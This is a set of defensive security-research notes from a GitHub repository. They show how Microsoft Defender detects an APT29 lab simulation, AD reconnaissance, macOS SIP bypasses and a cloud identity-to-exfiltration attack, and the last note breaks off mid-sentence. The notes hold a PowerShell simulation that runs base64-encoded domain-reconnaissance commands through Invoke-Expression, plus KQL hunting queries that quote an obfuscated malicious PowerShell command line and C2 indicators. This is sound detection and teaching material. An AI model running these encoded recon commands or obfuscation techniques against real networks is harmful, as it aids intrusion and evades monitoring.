-------------------------------------------------------------------------------- 1 | # Day 2 - APT29, Midnight Blizzard (NOBELIUM), Evaluation Lab 2 | > 📢 April 18, 2023 - Microsoft has changed its naming taxonomy for threat actors, moving away from using element symbols to using [weather-related names](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/). APT29 attack was named Midnight Blizzard in Microsoft's new naming taxonomy for threat actors. In this blog, I will use the name "NOBELIUM" instead of Midnight Blizzard. 3 | 4 | 5 | In Microsoft Defender for Endpoint's [Evaluation Lab(MDE)](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/evaluation-lab?view=o365-worldwid), Solorigate attack simulation(NOBELIUM) is covered. During this time, I will mainly focus on demonstrating MDE detection capabilities and how MDE captures the attack as EDR, XDR. Additionally, the available response capabilities of the product will be presented. 6 | 7 | 8 | ![image](https://user-images.githubusercontent.com/120234772/231689408-6805a007-69c2-46db-a834-f11e7a5d1870.png) 9 | > Solorigate in MDE Evaluation Lab 10 | 11 | ## Incident response with Microsoft 365 Defender 12 | During incident response, there are various approaches and scenarios, and Microsoft offers comprehensive documentation on incident response for Microsoft 365 Defender. At this time, I would like to focus on **containment** and **investigation**, as highlighted in the blue line below: 13 | ![image](https://user-images.githubusercontent.com/120234772/231698357-8ba1ef53-4c19-4ca8-9eba-0aba46681b06.png) 14 | > incident response workflow, [Incident response with Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender/incidents-overview?view=o365-worldwide) 15 | 16 | 17 | ## Incident response, investigation 18 | 19 | ### Let's investigate the details of the incident 20 | 21 | Here are some important points to consider during [the investigation](https://learn.microsoft.com/en-us/microsoft-365/security/defender/incidents-overview?view=o365-worldwide). 22 | 23 | 1. Where the attack started. 24 | 2. What tactics were used. 25 | 3. How far the attack has gone into your tenant. 26 | 4. The scope of the attack, such as how many devices, users, and mailboxes were impacted. 27 | 5. All of the data associated with the attack. 28 | 29 | >**Note** : When starting an investigation, it's important to navigate to **the incident page** instead of the alert page. This is because there can be a large volume of alerts and people may become lost or unsure of what they need to find. 30 | 31 | 32 | | [Summary] | Check points | 33 | |:---|:---| 34 | | MITRE ATT&CK tactics | Analyze the full scope of attack using the MITRE ATT&CK framework. | 35 | | Scope | Check the impacted assets such as devices, users, mailboxes, and apps.| 36 | | Evidence | Ensure that any suspicious activities related to the incident are identified. | 37 | | Alerts | Check the timeline of those alerts. | 38 | 39 | e.g. 40 | At the time of the incident, I can see that 23 alerts are associated with it and [testmachine8] is an impacted device that requires action(containment) to be taken for incident response. In terms of suspicious activities, MDE has detected 31 entities. 41 | 42 | ![image](https://user-images.githubusercontent.com/120234772/231705669-82ce321d-d4c2-41df-ada8-43662ddf604d.png) 43 | > Summary, Incident page 44 | 45 | | [Attack story] | Check points | 46 | |:----|:----| 47 | | Incident graph | Check how your assets are related to suspicious entities and activities using a graph. | 48 | | Alerts (Timeline) | Check how many alerts associated with an incident, as well as the timeline of those alerts. | 49 | 50 | e.g. 51 | In the attack timeline, since the alert started from "suspicious service launched," it's possible that the service may have created additional malicious files or even established a C2C connection. Also, when I examine the incident graph, I can see that testmachine8 is connected to 'panhardware.com' and related files and processes. 52 | 53 | ![image](https://user-images.githubusercontent.com/120234772/231706242-4623984f-8853-48e5-8e02-6e71c4ad3f91.png) 54 | > Attack story, Incident page 55 | 56 | ### Let's look into the depth of the alert 57 | This is one of the alerts in the incident. The attack began from sbsimulator.exe and sbsimulation_sb_340461_bs_293713.exe created a file bdata.bin which was detected as malicious activities. 58 | 59 | ![image](https://user-images.githubusercontent.com/120234772/231714249-885594bd-be8b-439a-a2e1-863dffd3b04a.png) 60 | > Alert story, Alert page 61 | 62 | Upon analyzing the timeline of the alert, it was found that all suspicious activities related to APT29 were captured on the device by MDE. I have summarized what the timeline is telling us. 63 | 64 | ![image](https://user-images.githubusercontent.com/120234772/233934128-8bb8670b-bccd-484e-90ce-6d4acf8fb79a.png) 65 | 66 | 67 | ## Incident response, containment 68 | Regarding containment of ***the impacted device***, MDE has the capability to remotely isolate the network from the device. 69 | - [Isolate devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#isolate-devices-from-the-network) 70 | - [Contain devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-devices-from-the-network) 71 | 72 | Also, if ***the user account*** has an impact on the breach, then other response options are available. 73 | - [Reset user account password](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) 74 | - [Disbale AD user / Azure AD user](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) 75 | 76 | 77 | ![image](https://user-images.githubusercontent.com/120234772/231706957-6b6e2e71-ed9c-4d02-afbf-06a59f9c9825.png) 78 | > e.g. Isolate devices from the network 79 | 80 | #### Disclaimer 81 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 82 | -------------------------------------------------------------------------------- /ProductResearch-Note-Folder/Day01-MDE-MDI-BetterTogether-Part1.md: -------------------------------------------------------------------------------- 1 | # MDE + MDI better together - Reconnaissance 2 | Hello all defenders and threat hunters, and thank you for visiting my product research note. 3 | In this blog series, I would like to zero in on Microsoft Defender for Endpoint (MDE) + Microsoft Defender for Identity (MDI) better together, showcasing the various advantages of deploying both products together. 4 | Let's start by looking at reconnaissance in Part 1. 5 | 6 | ### Reconnaissance ? 7 | Reconnaissance is the initial phase in which attackers gather information about the target network or system, identify vulnerabilities, and collect information. 8 | This collected data will be used by the adversary to aid in other phases of the attack, such as initial access and credential theft. 9 | 10 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/ea593e3e-d171-4101-80b6-48e80a0aa0eb) 11 | 12 | ## Detection, XDR 13 | 14 | The attacker wants to collect on-premise Active Directory (AD) information initially, and they executed some 'net' commands on the compromised device. 15 | The significant aspect of deploying MDI is the ability to visualize the detection of what is happening on the compromised device in terms of identity. 16 | However, if you have MDE (endpoint protection), it is also possible to see all commands that were executed by attackers. In the end, you will be able to see alerts generated by MDI and MDE. 17 | 18 | At this time, I simulated [a ninja.ps1](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day01-MDE-MDI-BetterTogether-Part1.md#simulation) script that executed some 'net' commands with base64 encoding on a compromised device, 19 | which is already a domain-joined device managed by on-premises AD and protected by MDE. 20 | After a few minutes, 1 incident (which is correlated with 3 alerts generated from MDE & MDI) appeared on Incident page on Microsoft Defender XDR portal and let’s take a look each important points. 21 | 22 | #### Incident, XDR correlation 23 | | Alert title | Source | Description | 24 | |:------------|:---------|:------------| 25 | | User and group membership reconnaissance (SAMR) | MDI | David Ninja on Win11CC sent suspicious SAMR queries to Svr2016, searching for: all users and all groups in mdipoc.com, and also 2 sensitive groups. | 26 | | Anomalous account lookups | MDE | An anomalous chain of attempts to look up user account information has been observed. An attacker might be gathering information about potential targets.| 27 | | Suspicious sequence of exploration activities | MDE| A process called a set of windows commands. These commands can be used by attackers in order to identify assets of value and coordinate lateral movement after compromising a machine.| 28 | > Details of the generated alerts in the incident 29 | 30 | Notably, the capability to correlate alerts from different Defender products into a single incident is one of the powerful features in Microsoft Defender XDR. 31 | Thanks to this capability, the page provides information on how many alerts were generated in this attack and displays related entities with a comprehensive graph. 32 | Furthermore, for taking further actions, Microsoft Defender XDR captures all related assets, such as accounts and devices involved in this attack. 33 | 34 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/5c2ebf8f-09ab-4336-838c-301da379eb75) 35 | > Incident page : Discovery incident on one endpoint reported by multiple sources 36 | 37 | #### MDI alert 38 | Regarding identity detection, MDI generated an alert related to reconnaissance, providing a high-level overview, attack details, and a graph. 39 | The attacker (from the compromised device) executed suspicious SAMR queries to the server, searching all users, groups, Domain Admins, and Schema Admins 40 | 41 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/562f108f-c254-404f-a9c7-0f51d62b0e9a) 42 | > MDI alert : User and group membership reconnaissance (SMAR) 43 | 44 | #### MDE alerts 45 | Another benefit of deploying MDE is the ability to capture device-level activities. Unlike MDI alerts, MDE alerts provide details of executed commands on the compromised device. 46 | This capability allows for the visualization of all command activities chronologically in the alert story and the mapping of all related entities, such as a suspicious PowerShell script, as highlighted in 'Ninja.ps1'. 47 | 48 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/641c457c-9dd6-4dba-a921-901b2cb6d3cd) 49 | > MDE alert : Anomalous account lookups, executed commands 50 | 51 | MDE can capture a PowerShell script mapping to MITRE ATT&CK™ techniques. 52 | During my simulation, specifically focused on reconnaissance, we observed several tactics of discovery and a few executions. 53 | 54 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/189ca17a-bc7f-40c8-9cd1-464a0002cee8) 55 | > MDE alert: Suspicious sequence of exploration activities 56 | 57 | ## Hunting with KQL 58 | Because the compromised device was protected by MDE, it captured net command activities and stored them in the DeviceProcessEvents table. In the end, by writing a query, you can see all net command activities in Advanced Hunting. 59 | 60 | ```kusto 61 | DeviceProcessEvents 62 | | where Timestamp > ago(7d) 63 | | where FileName == "net.exe" 64 | | where ProcessCommandLine has_any ("/domain", "user", "group") 65 | | summarize CmdList = make_set(strcat(format_datetime(Timestamp,'yyyy-M-dd H:mm:ss'), " : ", ProcessCommandLine)) by DeviceId, DeviceName 66 | | extend Case = array_length(CmdList) 67 | | project DeviceId, DeviceName, Case, CmdList 68 | | order by Case desc 69 | ``` 70 | > GitHub : LearningKijo/KQL - [Endpoint-NetExeListing-Reconnaissance.yaml](https://github.com/LearningKijo/KQL/blob/main/KQL-XDR-Hunting/Endpoint-Microsoft-Defender-for-Endpoint/Endpoint-NetExeListing-Reconnaissance.yaml) 71 | 72 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8aefd6d0-2c15-432a-9f49-2db312203136) 73 | > Advanced Hunting : tracking net command activities 74 | 75 | ## Simulation 76 | ```powershell 77 | # Run net user /domain 78 | Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IHVzZXIgL2RvbWFpbg=="))) 79 | 80 | # Run net group /domain 81 | Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IGdyb3VwIC9kb21haW4="))) 82 | 83 | # Run net group "Domain Admins" /domain 84 | Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IGdyb3VwICJEb21haW4gQWRtaW5zIiAvZG9tYWlu"))) 85 | 86 | # Run net group "Enterprise Admins" /domain 87 | Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IGdyb3VwICJFbnRlcnByaXplIEFkbWlucyIgL2RvbWFpbg=="))) 88 | 89 | # Run net group "Schema Admins" /domain 90 | Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IGdyb3VwICJTY2hlbWEgQWRtaW5zIiAvZG9tYWlu"))) 91 | ``` 92 | 93 | 94 | #### Disclaimer 95 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 96 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day14-macOS-SIP-Bypass-Insights.md: -------------------------------------------------------------------------------- 1 | # Day 14 - macOS SIP Bypass insights 2 | Hi there !! Thank you for visiting [@SecurityResearch-Note](https://github.com/LearningKijo/SecurityResearcher-Note). 3 | Last time, I had the opportunity to delve deeper into macOS exploitation, specifically focusing on ***"SIP Bypass"***. 4 | However, macOS is relatively new to me, with features like SIP (System Integrity Protection), entitlements, TCC (Transparency, Consent, and Control), and more. 5 | That's why, I was considering that creating a super brief summary would be beneficial for someone new to macOS. 6 | 7 | ## What is SIP ? 8 | SIP is one of the security features in macOS designed to protect critical system files and processes from being tampered with or modified by unauthorized users or malicious software. 9 | 10 | **Let's consider disabling SIP from a red team perspective....** 11 | 12 | On macOS, even the root user is not allowed to modify important system files under the SIP protection and this is called ***"Rootless"***. 13 | Therefore, in terms of privilege escalation and attackers, gaining root user access on macOS doesn't provide much for exploitation because of SIP. 14 | Not to mention, there is [a legitimate way to disable SIP](https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection#3599244), but it requires booting into recovery mode, which would be difficult for an attacker to accomplish. 15 | I would say ***"SIP provides a robust level of protection on macOS"***. 16 | 17 | As we may have observed, disabling SIP is not easy and cannot be accomplished with just a few bash commands. 18 | I couldn't even find any publicly available penetration testing tools for it. 19 | In the end, when elevating privilege, the focus should be on ***"macOS vulnerabilities"***. 20 | 21 | > [!Note] 22 | > System Integrity Protection includes protection for these parts of the system: 23 | > - /System, /usr, /bin, /sbin, /var 24 | > - Apps that are pre-installed with the Mac operating system 25 | > 26 | > > [About System Integrity Protection on your Mac](https://support.apple.com/en-us/102149#:~:text=System%20Integrity%20Protection%20is%20a%20security%20technology%20designed%20to%20help,and%20folders%20on%20your%20Mac.) 27 | 28 | 29 | ## SIP & Entitlement 30 | After learning about the SIP security feature, I have a better understanding of how challenging it is for attackers to exploit the critical system, thanks to its robust protection. 31 | That's why, attackers often seek ways to bypass SIP without disabling it. 32 | While I was reading through Microsoft security blog - [Shrootless](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/), I came across a key sentence that explains ***"the relationship between SIP and entitlements"***, which has a significant impact on SIP bypass attack. 33 | 34 | ![image](https://github.com/LearningKijo/Malware-Analysis/assets/120234772/2ed0f115-2cc8-42ec-b054-4adcd2b1b852) 35 | 36 | ***"In short, if there is a process with entitlements that allow it to modify the critical system, it is possible to bypass SIP on macOS."*** 37 | 38 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/fbe77589-a3a7-47fc-bcd3-0acbf1b30885) 39 | 40 | > e.g. ‘Shrootless’ - system_installd entitlements 41 | 42 | > [!Important] 43 | According to Apple's documentation, an [entitlements](https://developer.apple.com/documentation/bundleresources/entitlements) is a right or privilege that grants an executable particular capabilities. 44 | 45 | ## SIP Bypass case 46 | Shrootless and Migraine are great examples of SIP bypass, both discovered by Microsoft Threat Intelligence team, Microsoft. 47 | As each blog covers the details, I would like to share a high-level insight with a summary below. 48 | 49 | ### Shrootless 50 | On October 21, 2021, [Microsoft](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) discovered a new macOS vulnerability, known as [CVE-2021-30892](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30892) or Shrootless, which has the potential to bypass System Integrity Protection. 51 | While examining macOS processes with SIP bypass entitlements, ***Microsoft found 'system_installd,' which had a powerful 'com.apple.rootless.install.heritable' entitlement, allowing child processes to bypass SIP restrictions.*** 52 | When installing an Apple-signed package, 'system_installd' handles the installation. 53 | If the package contains post-install scripts, they're executed using the 'zsh' shell, which ***automatically runs commands from the '/etc/zshenv' file***, even in non-interactive mode. 54 | This creates a potential avenue for attackers to perform arbitrary operations by creating a malicious '/etc/zshenv' file and waiting for 'system_installd' to invoke 'zsh'. 55 | 56 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/5462c1bb-434f-4b19-936f-930acb5e77e9) 57 | 58 | 59 | ### Migraine 60 | After the discovery of Shrootless (CVE-2021-30892), [Microsoft](https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/) identified a new macOS vulnerability with similarities, referred to as [CVE-2023-32369](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32369) or Migraine, on May 30, 2023. 61 | This vulnerability also has the potential to bypass System Integrity Protection. The attack can be initiated by starting the migration process through the Migration Assistant, which is one of the processes with entitlements to bypass SIP security checks. The Migration Assistant, in turn, interacts with other processes that have the necessary entitlements. ***Among these processes are bash and perl, which are interpreters capable of executing arbitrary code.*** 62 | 63 | As a result, an attacker can exploit this flow to run suspicious or malicious code by leveraging the Migration Assistant's interaction with these processes. 64 | By executing arbitrary code within the context of these trusted processes, the attacker can effectively bypass SIP protections and carry out actions that could compromise system integrity or install persistent malware. 65 | 66 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/502ba15f-83f2-4728-a20f-ff04f3c7d9c3) 67 | 68 | If you are interested in the details, I highly recommend reading the blogs, and you can find the links in the Reference section. 69 | 70 | ## Reference 71 | - October 28, 2021, [Microsoft finds new macOS vulnerability, Shrootless, that could bypass System Integrity Protection](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) 72 | - May 30, 2023, [New macOS vulnerability, Migraine, could bypass System Integrity Protection](https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/) 73 | 74 | #### Disclaimer 75 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 76 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day02-APT29-Part2-Midnight-Blizzard.md: -------------------------------------------------------------------------------- 1 | # Day 2 - APT29, Midnight Blizzard (YTTRIUM) 2 | > 📢 April 18, 2023 - Microsoft has changed its naming taxonomy for threat actors, moving away from using element symbols to using [weather-related names](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/). APT29 attack was named Midnight Blizzard in Microsoft's new naming taxonomy for threat actors. In this blog, I will use the name "YTTRIUM" instead of Midnight Blizzard. 3 | 4 | 5 | ## What is YTTRIUM ? 6 | YTTRIUM is a codename that Microsoft has given to a specific activity group believed to be part of APT29 or Cozy Bear, a Russian state-sponsored advanced persistent threat group known for its cyber espionage activities. This group is known for using advanced hacking techniques, including spear phishing, zero-day exploits, and social engineering tactics to target government agencies, critical infrastructure, and other high-profile organizations. 7 | 8 | > **Note** : Microsoft Security blog - "Third-party security researchers have attributed the attack to a threat actor named APT29 or CozyBear, which largely overlaps with the activity group that Microsoft calls YTTRIUM" 9 | 10 | ### What is the difference between Yttrium and Nobelium? 11 | Yttrium and Nobelium are two separate threat groups that have been linked to **APT29 (Cozy Bear) in the past**, but they are not the same group. Also, the two groups are believed to have different tactics, techniques, and procedures (TTPs) and may target different types. 12 | 13 | 14 | ## YTTRIUM Attack Chain 15 | APT29, also known as YTTRIUM, initiated their cyber attack through a combination of **spear-phishing email attacks** and **social engineering**. The malicious links in the emails, if clicked by the recipients, led to a series of exploits that ultimately resulted in the installation of a DLL backdoor. This backdoor gave the attackers remote access to the victims' machines. 16 | 17 | 18 | 19 | > [Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/) 20 | 21 | #### Regarding compromised website, was the email link initially not malicious? 22 | Yes, that's correct. The attackers compromised a legitimate website that was not originally malicious. By doing so, the attackers were able to host their malicious code on the website and deliver it to unsuspecting visitors. 23 | 24 | #### Did email security tools prevent the initial malicious link used in the APT29 attack? 25 | Some mail security tools were able to identify the spear-phishing email used in the APT29 attack at the time, but not all security tools could do so. It depends on the specific tool being used. Nowadays, most security tools have improved their detection capabilities and would likely be able to identify similar attacks. 26 | 27 | #### What is LNK file? 28 | LNK is a file extension used for Windows Shortcut Files. It is a file format used by Windows to create shortcuts to files, folders, or programs. In APT29 attacks, attackers can craft LNK files that appear legitimate but actually point to malicious code or websites. 29 | 30 | #### What is Cobalt Strike? 31 | It is a penetration testing tool. In Cobalt Strike, a local named pipe is created with the format [**\\.\pipe\MSSE--server, where \**] is a random number between 0 and 9897. Then, the attacker connects to the named pipe and sends global data with size 0x3FE00. Finally, the attacker uses this named pipe to implement a backdoor, giving them access to the compromised system. 32 | 33 | ![image](https://user-images.githubusercontent.com/120234772/229047009-be2be785-b3c8-4759-9960-ffc14a79b1a3.png) 34 | > Cobalt Strike, [Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/) 35 | 36 | ## KQL : Hunting 37 | In the [Microsoft Security blog](https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/), they provide excellent hunting queries for APT29 (YTTRIUM). However, the tables they used appear to be outdated. Therefore, I updated these queries using the latest tables to track them down. Additionally, I highlighted some IoC that were covered in the out-of-the-box queries provided in the blog. 38 | 39 | #### YTTRIUM IoC 40 | ```kql 41 | SHA1 = "9858d5cb2a6614be3c48e33911bf9f7978b441bf" 42 | SHA1 = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1" 43 | RemoteUrl = "pandorasong.com" 44 | RemoteIP = "95.216.59.92" 45 | ProcessCommandLine contains "https://www.jmj.com/personal/nauerthn_state_gov" 46 | ProcessCommandLine contains "-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0" 47 | ``` 48 | 49 | #### Advanced hunting query 50 | ```kql 51 | //Query 1: Events involving the DLL container 52 | let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf"; 53 | find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents) 54 | where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash 55 | | where Timestamp> ago(10d) 56 | 57 | //Query 2: C&C connection 58 | DeviceNetworkEvents 59 | | where Timestamp > ago(10d) 60 | | where RemoteUrl == "pandorasong.com" 61 | 62 | //Query 3: Malicious PowerShell 63 | DeviceProcessEvents 64 | | where Timestamp > ago(10d) 65 | | where ProcessCommandLine contains "-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0" 66 | 67 | //Query 4: Malicious domain in default browser commandline 68 | DeviceProcessEvents 69 | | where Timestamp > ago(10d) 70 | | where ProcessCommandLine contains "https://www.jmj.com/personal/nauerthn_state_gov" 71 | 72 | //Query 5: Events involving the ZIP 73 | let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1"; 74 | find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, 75 | DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents) 76 | where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash 77 | | where Timestamp > ago(10d) 78 | 79 | // Reference : 80 | // https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ 81 | ``` 82 | ## Reference 83 | 84 | MITRE ATT&CK®, [Home > Groups > APT29](https://attack.mitre.org/groups/G0016/)
85 | Microsoft, [MITRE ATT&CK APT 29 evaluation proves Microsoft Threat Protection provides deeper end to end view of advanced threats](https://www.microsoft.com/en-us/security/blog/2020/04/21/mitre-attack-evaluation-prove-microsoft-threat-protection-against-threats/)
86 | Microsoft, [Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/) 87 | 88 | #### Disclaimer 89 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 90 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part2.md: -------------------------------------------------------------------------------- 1 | # Cloud-Based Identity to Exfiltration Attack (Part2) 2 | This blog is a part 2. If you haven't seen part 1, I highly recommend visiting [Day16-CloudId-Exfiltration-AttackReport-Part1.md 3 | ](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part1.md). 4 | 5 | #### Background 6 | Identity attacks have been increasing every single day. Over the past few years, attackers have been observed attempting to transition from on-premise to cloud environments for further exploitation. 7 | Today, I would like to showcase some detection insights regarding attacks, starting from cloud-based identity attacks and extending to compromised Office 365 environment. 8 | 9 | Here is the complete attack scenario that I simulated manually, step by step. 10 | 11 | "Assuming the attacker has obtained the email address information and requires a password to log in to Office 365/Outlook, they begin by attempting to access it with various easily guessable passwords at random. 12 | After a few attempts, they manage to guess the password, but their access is blocked by MFA (Multi-Factor Authentication). 13 | Subsequently, they resort to repeatedly requesting MFA approval to exhaust the targeted user, a technique known as MFA fatigue. 14 | Eventually, after 10-15 attempts, the user approves access due to exhaustion." 15 | 16 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3354a892-e4a3-4ac0-a126-cb6abd3f3421) 17 | > Cloud-Based Identity to Exfiltration : Attack flow 18 | 19 | ## Attack Simulation : Part 2 20 | As I've divided this attack insight into two parts, I would like to focus on the activity after the attacker successfully logs into Office 365. 21 | 22 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/14c3faa8-06af-48fb-ae15-c61785083e85) 23 | 24 | 25 | ### Suspicious Forwarding rules 26 | After successful login, we observed the creation of forwarding rules in the alert and attack story. 27 | Additionally, as depicted in the incident graph, we can discern the impacted user account and email account. 28 | Moreover, we identified the IP address the attacker used and captured the forwarded email account, potentially revealing the attacker's email address for information leakage through Outlook. 29 | 30 | In terms of the alert timeline, Microsoft Defender for Cloud Apps initially detected suspicious activity from a captured Tor IP address, which included the creation of a forwarding rule with a Tor IP address originating from Germany.Continuously generated was "Suspicious Email Forwarding Rule" alert. 31 | Additionally, Microsoft Defender XDR correlated "Impossible Travel activity" alert from [Part 1](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part1.md) with "Suspicious Inbox Forwarding Rule", ultimately identifying ***"Suspicious email forwarding rule"*** as the XDR source 32 | 33 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/da5a1f43-dc95-4fc4-8657-a309477aabc9) 34 | 35 | 36 | In order to view detailed values from forwarding rule creation, we can utilize Microsoft Defender for Cloud Apps, App Connector, Office 365, and access raw data with JSON data / values. 37 | Here are examples from two alerts. 38 | ``` 39 | 40 | "Name" : "ForwardTo", "Name" : "SubjectContainsWords" 41 | "Value": "xxxxxxxxxxx@outlook.com", "Value": "Info;Data;Important" 42 | -------------------------------------------------------------------- 43 | "Name" : "ForwardTo", "Name" : "SubjectContainsWords" 44 | "Value": "xxxxxxxxxxx@outlook.com", "Value": "Payment;Money;Invoice" 45 | ``` 46 | 47 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/4a9648e2-066f-467e-abab-d1ec6ff9feb8) 48 | > Alert page / Source / App Connector / View raw data 49 | 50 | ### Mass Download 51 | After creating the forwarding rules, we observed the attacker moving to a SharePoint site to conduct further activities. 52 | Based on the generated alerts, it appears that the attacker is attempting to download a number of files from the SharePoint site, ***possibly for the purpose of file exfiltration***. 53 | 54 | The key information is to examine related activities on the alert page. 55 | ``` 56 | 1. Activitiy - Download file : SharePoint site url 57 | 2. User - Darol, compromised user account 58 | 3. App - SharePoint 59 | 4. IP address - Attacker/ Tor IP address 60 | 5. Location - Germany, using a Tor browser 61 | ``` 62 | 63 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e68b06d4-1be6-47ad-9992-d9554d049044) 64 | 65 | By selecting [Investigate in activity log], you can view all downloading file activities initiated by the attacker using the Tor browser. 66 | We confirmed ***a total of 54 download activities*** in the end. 67 | 68 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/c382f3d8-c89b-4ea5-bfe3-cd89a36122b7) 69 | > Alert page / Investigate in activity log / Activity log 70 | 71 | Additionally, "Anonymous IP address" was captured in a previous suspicious login phase. 72 | Microsoft Defender XDR correlated "Mass download" activities and integrated them into a new alert - ***"Suspicious behavior: Mass download"***. 73 | 74 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/dd3a5da6-4be7-45f1-ba3e-a1d565ebf40f) 75 | 76 | 77 | ### Mass Delete 78 | The final activity involved deleting files in SharePoint site, categorizing it as 'Impact' and ['Data Destruction'](https://attack.mitre.org/techniques/T1485/) in MITRE ATT&CK. 79 | Similar to the download activity, Microsoft Defender for Cloud Apps monitored these deletion activities, capturing IP addresses, locations, file activity, user accounts, and related applications. 80 | 81 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7a520fcd-eb90-4e46-8618-b8f2c7cc9e4f) 82 | 83 | By selecting [Investigate in activity log], you can view all deleting file activities initiated by the attacker using the Tor browser. We confirmed ***a total of 206 delete activities*** in the end. 84 | 85 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/01dae4cc-0930-4f6a-b7ed-2502cf1d0020) 86 | > Alert page / Investigate in activity log / Activity log 87 | 88 | Similar to the downloading activity, ***the deletion activity is also correlated into one alert, "Suspicious behavior: Mass delete", by Microsoft Defender XDR***. 89 | XDR was looking at two alerts : "Anonymous IP addresses" and "Mass deletion" activities. 90 | 91 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3c3522c1-fcd5-405b-b677-fe154ace958d) 92 | 93 | I hope this simulation and detection insight were helpful for you. This time, we focused on showcasing an attack - identity-based cloud breach and the subsequent move to further attack in Office 